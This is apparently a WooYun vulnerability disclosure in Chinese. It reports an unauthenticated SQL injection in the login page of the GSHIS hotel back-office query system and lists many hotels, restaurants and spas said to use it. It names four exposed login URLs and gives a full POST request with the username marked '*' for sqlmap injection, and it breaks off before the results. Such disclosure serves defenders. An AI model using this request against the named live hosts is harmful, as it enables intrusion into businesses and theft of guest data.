WooYun.org

GSHIS捷信达酒店后台查询系统处未做登陆过滤，导致了高危SQL注入漏洞
海量酒店中枪
涉及的部分酒店案例：
深圳恒丰海悦国际酒店
深圳百合酒店
深圳南岭求水山大酒店
深圳中保国际酒店
深圳宝亨达国际大酒店
深圳市前岸国际酒店
深圳新都酒店
深圳皇廷假日酒店
广州达镖国际酒店
广东东莞丽城假日酒店
广东东莞常平汇华国际饭店
广东惠州惠东恒升酒店
广东梅州客天下深航国际酒店
广东惠州金华悦商务酒店
广东惠州国惠大酒店
广东清远阳山卓代花园酒店
广东佛山南海名都大酒店
广东清远连州国际大酒店
广州天河大厦
广东惠阳丽景花园酒店
广东普宁市碧辉园温泉酒店
湖北武汉雄楚国际酒店
内蒙古玖苑国际饭店
黑龙江大庆曼哈维国际酒店
银川市九洲国际大饭店
云南大理海湾酒店
山东潍坊天和思瑞国际大饭店
山东兖州圣德国际大酒店
北京星河湾酒店公寓
福建石狮建明国际大酒店
福建漳州宾馆
广西玉林嘉和国际大酒店
广西贺州市正菱大酒店有限公司
贵州松桃国际大酒店
江苏启东先豪国际酒店
浙江天悦湾度假大酒店
浙江嵊州保罗大酒店
浙江台州玉环县福朋喜来登酒店
郑州天鹅城大酒店
赣州香江湾国际大酒店
餐饮（代表用户）
深圳万象城留园餐厅
深圳金麒麟餐饮（香港）有限公司
深圳市盛世嘉创投资管理有限公司臻品轩
深圳品味轩私房菜
深圳联城振兴酒楼
深圳冯记厨房
深圳三岛潮皇酒楼
深圳维也纳美食宫
深圳百合豪宴
深圳南岗渔村
深圳万事达酒楼
深圳星期五美食餐厅
深圳御花园海鲜酒楼
深圳山海轩天然饮食有限公司
深圳侨城一品酒楼
深圳名人俱乐部海鲜酒楼
深圳景田东海酒家
深圳凤凰半岛酒楼
深圳海上世界乐汶堡餐厅酒吧
广东东莞元通回转寿司
广东东莞东城食府
广东东莞东海海都海鲜酒楼
苏州迎福轩餐饮有限公司
福建厦门渔失码头海鲜不夜城
广东东莞旺记海鲜酒楼锦新店
广东东莞旺记海鲜酒楼锦绣总店
广州粤豪酒家墩和店
广州妈子靓汤江湾店
广东汕头天天渔港
广东惠阳南海渔村
北京大千食府
广东东莞市海都六福饮食有限公司
福建厦门渔夫码头海鲜食坊
广东东莞汇源海港大酒楼
广西南宁上岛咖啡
肇庆端州大酒楼
山西太原吉庆大酒楼
山东邹城百大生态餐饮娱乐有限公司
四川成都港岛海鲜馆
四川成都凯宴美湖
水疗（代表用户）
深圳德仕堡国际会所
深圳水立方国际水疗会所
深圳水都国际健康水会
深圳皇室假期美食水疗会
深圳678水疗会所
深圳市太平洋休闲超市
深圳东部华侨城茵特拉根山泉SPA
深圳嘉年华会
深圳市皇廷水丽方国际水会
深圳银湖国际健康会所
深圳金逗号
广州汉景银矿湾国际水会
广州海角红楼休闲会所
云南昆明久德公馆
广州水玲珑会馆
广州水悦半岛休闲会所
广东湛江嘉年华会
香港维港棕泉桑拿
香港维港会所
上海大浪淘沙沐浴餐饮有限公司
广东中山超班医养会
广东东莞帝豪会
云南昆明春城花园水会
云南水星温泉城市会所
昆明水天温泉会所
北京赛纳河商务会馆（立水桥店）
福建厦门水务集团晋爵会
福建厦门东妮娅国际商务会馆
湖北武汉水之梦水疗
湖北武汉东湖在水一方
广西梧州威尼斯水城
北京塞纳河休闲商务会馆
武汉汉晶宫酒店管理有限公司
呼和浩特阿拉丁会所
沈阳希尔斯池典水疗
大连芙蓉水尚休闲水疗会馆
山东青岛芭东会
海南海口乐池水会
重庆巴厘水会
重庆帝景大浪淘沙娱乐有限公司
集团（代表用户）
中青旅山水时尚酒店投资有限公司
深圳市万科酒店管理有限公司
深航酒店投资管理有限公司
深圳招商商置公司（美伦酒店管理公司）
长城物业集团股份有限公司
深圳市枫叶酒店投资有限公司
深圳好时光酒店管理公司
深圳天健集团威斯特酒店管理公司
深圳中南酒店投资管理有限公司
深圳市中泰来酒店管理有限公司
深圳鸿基酒店管理公司
深圳深业集团酒店管理公司
深圳悦来客栈酒店管理公司
深圳市第壹站快捷酒店有限公司
深圳汇合投资有限公司
深圳市三江源实业有限公司
深圳万福盈酒店投资管理有限公司
深圳品味轩私房菜投资有限公司
深圳天天酒店管理公司
深圳南国连锁酒店
香港十友控股呼噜栈酒店管理公司
广东东莞元通回转寿司餐饮连锁
广州百客蛮好酒店管理服务有限公司
河南三门峡怡居酒店有限公司
广东中山菊城酒店管理有限公司
广东顺德佛奥酒店集团
广东博雅酒店投资管理有限公司
武汉水之梦水疗连锁机构
名典商旅连锁酒店
福建石狮万佳东方连锁酒店
清远步步高酒店集团
……
……
因为是内网系统，暴露在公网的只有少的可怜的案例
来简单看一些暴露在公网的案例：
http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx
http://xlfhssygjr.eicp.net:81/QueryWebs/Account/Login.aspx
http://222.51.224.76/QueryWebs/Account/Login.aspx
http://sjhj075489802999.eicp.net:81/QueryWebs/Account/Login.aspx?ReturnUrl=~%2fQuery.aspx
登录处POST数据包
用户名未过滤直接带入查询
SQL注入产生
来看数据包，拿http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx
POST /QueryWebs/Account/Login.aspx?ReturnUrl=%2fQueryWebs%2fAccount%2f HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=%2fQueryWebs%2fAccount%2f
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 119.145.193.214
Content-Length: 510
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=g1od1h33x31ykpc12n5lfi52
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwNzQ3MjM5NzgPZBYCZg9kFgICAw9kFgYCAQ8PFgIeBFRleHQFKOm%2Bmea6kOa4qeazieWkp%2BmFkuW6lyDkuJrkuLvmn6Xor6Lns7vnu59kZAIHDxYCHgdWaXNpYmxlaGQCCw9kFgICCw8PFgIfAAUQ55So5oi35ZCN6ZSZ6K%2BvIWRkZGmeSbP%2BmJ5qJWtdnXu6TUi14XMyLAsCmX0Zsnjtinn0&__EVENTVALIDATION=%2FwEWBAK2oPjVBQLM%2F%2FiZCQLDx7adCALv8O2RCj1STnAjiluSHyBrTqSdTjpQnumDShlAbBFdTFVDGGyG&ctl00%24MainContent%24UserName=asd*&ctl00%24MainContent%24Password=asd&ctl00%24MainContent%24LoginButton=%E7%99%BB%E5%BD%95
用户名+*，SQLMAP下产生注入结果: